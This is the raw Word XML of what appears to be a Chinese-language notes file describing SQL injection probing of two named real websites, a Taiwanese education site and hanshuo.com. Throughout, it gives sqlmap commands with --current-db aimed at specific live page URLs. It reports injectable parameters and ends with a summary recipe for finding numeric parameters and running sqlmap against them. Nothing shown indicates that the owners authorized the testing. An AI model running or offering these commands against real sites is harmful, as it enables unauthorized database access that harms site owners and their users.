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3F1B12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第一个网站:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041FBF18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2648557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(1)思路:对导航栏的每一个元素进行排查,观察url的变化,观察参数出现次数,例如q_no=*&amp;action_qa=info (*通配符,代表任意数字),发现修改q_no为别的数字可以得到不一样的页面跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DDD41E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3108960"/>
            <wp:effectExtent l="0" t="0" r="825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6BD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例如修改为q_no=6可得到第6条数据的跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DDDF4">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3116580"/>
            <wp:effectExtent l="0" t="0" r="63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CD019"/>
    <w:p w14:paraId="08C50A8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有了想法然后打开命令行输入下面命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A5EB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sqlmap -u "http://nurture.3589559.com.tw/qa.php?q_no=5&amp;action_qa=info" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA12DFB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行结果如下图</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3286125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D1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可以发现是有Paramter参数的,说明存在SQL注入的.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883474D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D9C353">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77480238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思路:同理在当前页面对每一个元素都点击尝试一下,发现在表单下载这个部分有跳转下载的情况,于是复制链接试一下,发现链接可以传参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FA6A5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如图:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F0809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35" cy="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400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2959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在新页面粘贴URL链接,可以发现很明显了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4805080A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="395605"/>
            <wp:effectExtent l="0" t="0" r="444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AE6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运行命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE57646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qlmap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"http://www.3589559.com.tw/model/download.php?no=2&amp;code=nurture&amp;action=form" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCE059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运行结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C55B6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="29679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B7F0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66ECB4EB"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思路:有了前两条的经验,我们来到最新消息的页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C568F5F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6690" cy="3100070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4ECA"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发现有跳转有分页,先从左边下手,全部下面有6个可选元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28958643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8595" cy="3143885"/>
            <wp:effectExtent l="0" t="0" r="825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755E"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抱着试一试的心态,运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202F7A2"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sqlmap -u "http://nurture.3589559.com.tw/news.php?nclass=%E8%B3%87%E8%A8%8A%E5%AE%A3%E5%B0%8E%E5%92%8C%E5%88%86%E4%BA%AB" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CB760"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运行结果如下,发现扫到了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972485E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2245" cy="2764155"/>
            <wp:effectExtent l="0" t="0" r="508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DB68">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39497928"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思路:在前三个的基础,直接造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5371A4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2245" cy="3087370"/>
            <wp:effectExtent l="0" t="0" r="508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4E64"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同理发现也是可以传参数,果断sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C49775"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运行命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24F887"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sqlmap -u "http://nurture.3589559.com.tw/news.php?action=cont&amp;sn=67" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3A9CA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608E335A"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9230" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="762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9C68">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BCB1DA"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来到大家都知道的课程页面,圈中部分都是可被点击的元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F9974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173095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="825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2F92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运行命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71960158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sqlmap -u "http://nurture.3589559.com.tw/course.php?clclass=1" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7982DC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9CB9E6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28695"/>
            <wp:effectExtent l="0" t="0" r="6985" b="508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BD9E">
      <w:pPr>
        <w:widowControl w:val="0"/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 w14:paraId="740C015E">
      <w:pPr>
        <w:widowControl w:val="0"/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(6)在课程页面发现多了个c_no参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF2FA7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25470"/>
            <wp:effectExtent l="0" t="0" r="8255" b="825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6C91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运行命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4D199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sqlmap -u "http://nurture.3589559.com.tw/course_info.php?clclass=3&amp;c_no=7" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6BF7D">
      <w:pPr>
        <w:widowControl w:val="0"/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6690" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="635" b="444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389C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F96DF6A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(7)思路:来到课程花絮这个页面发现有acsn这个参数,试一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B1548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 w14:paraId="61612A19">
      <w:pPr>
        <w:widowControl w:val="0"/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 w14:paraId="234E0DF1"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690" cy="3075940"/>
            <wp:effectExtent l="0" t="0" r="635" b="6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E46D6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3778DE50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运行命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6AC10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sqlmap -u "http://nurture.3589559.com.tw/activities_album_cont.php?action=activities_course&amp;acsn=8" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F586D1E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运行结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FE6E9"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055" cy="2991485"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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FF64">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD699B4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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来到下面这个页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B998FF3"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3515" cy="3090545"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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63E7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不多说,直接sqlmap,运行如下命令:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904E83D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sqlmap -u "http://nurture.3589559.com.tw/discuss.php?action=list&amp;cno=2" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A08F5"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690" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="63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904D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108A6DAC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F60337A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D72E4D3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433F360F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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第二个网站:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78100A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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命令:sqlmap -u "https://www.hanshuo.com/cht/news.php?nc_id=1" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F295AC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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运行结果:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA9A65">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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6690" cy="3098165"/>
            <wp:effectExtent l="0" t="0" r="635" b="698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2D52">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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命令:sqlmap -u "https://www.hanshuo.com/cht/news.php?func=n_show&amp;nc_id=1&amp;n_id=40" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8867D6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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运行结果:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190A8A7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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6690" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="635" b="444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B096">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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命令:sqlmap -u "https://www.hanshuo.com/cht/news.php?func=n_list&amp;nc_id=1&amp;now_page=2&amp;jump_page=" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED9C7C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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运行结果:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C9623">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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6690" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="635" b="444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FE275">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111B57B7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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总结:对网页每一个元素疯狂挖掘,通俗易懂的讲就是找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?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号后带有数字的参数,修改数字,如果能够成功跳转那么再用sqlmap,经验多了直接上命令sqlmap -u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url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--current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF286B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中宋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CF5BEB9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCF5BEB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DD6DCA99"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DD6DCA99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E85763FC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E85763FC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="8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Q5OTAyMzFmZmEyNjFiMWQxNDU0OGEyMGNhNWQwMTcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="755E6BE5"/>
    <w:rsid w:val="0D7D62E4"/>
    <w:rsid w:val="1F5B7EC4"/>
    <w:rsid w:val="3115045E"/>
    <w:rsid w:val="5D3517B2"/>
    <w:rsid w:val="6F2262E0"/>
    <w:rsid w:val="755E6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../NUL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2024-07-14T10:30:00Z</dcterms:created>
  <dc:creator>╰☆╮爱你╰つ不变心</dc:creator>
  <cp:lastModifiedBy>╰☆╮爱你╰つ不变心</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-14T13:02:54Z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03942EABB3904A1192CAC3D5E644A106_11</vt:lpwstr>
  </property>
</Properties>
</file>